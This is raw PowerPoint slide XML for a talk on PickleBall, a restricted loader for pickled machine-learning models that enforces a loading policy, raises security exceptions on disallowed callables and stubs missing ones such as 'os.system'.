            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>missing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>unimportant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> callables</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="2615475"/>
            <a:ext cx="2005500" cy="554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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import GradDescent</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import os.system</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312775" y="2252725"/>
            <a:ext cx="2005500" cy="554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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“GradDescent”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“os.system”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1282" name="Shape 1282"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1284" name="Google Shape;1284;p101"/>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1285" name="Google Shape;1285;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902825" y="2252725"/>
            <a:ext cx="1590300" cy="2119500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8775">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="83975" lIns="83975" spcFirstLastPara="1" rIns="83975" wrap="square" tIns="83975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992928"/>
            <a:ext cx="630600" cy="606300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19125">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91625" lIns="91625" spcFirstLastPara="1" rIns="91625" wrap="square" tIns="91625">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1402"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1287" name="Google Shape;1287;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992927"/>
            <a:ext cx="630405" cy="606068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1288" name="Google Shape;1288;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177425" y="3710825"/>
            <a:ext cx="1092000" cy="615000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1289" name="Google Shape;1289;p101"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320625" y="4018325"/>
            <a:ext cx="1590300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p101"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="2338825"/>
            <a:ext cx="1679100" cy="688800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213671" y="1800712"/>
            <a:ext cx="563087" cy="525483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p101"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546349" y="3141134"/>
            <a:ext cx="688200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221788" y="2252722"/>
            <a:ext cx="1092000" cy="603600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="1454725"/>
            <a:ext cx="1426500" cy="434700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295" name="Google Shape;1295;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516368" y="2980667"/>
            <a:ext cx="502800" cy="407400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1323">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="1323">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164559" y="3460128"/>
            <a:ext cx="1206300" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1297" name="Google Shape;1297;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="5531050"/>
            <a:ext cx="3911100" cy="2955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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>drop-in replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> for the pickle module. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Raises security exceptions when opcodes import or invoke disallowed callables.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall loads policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for missing but unimportant callables. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
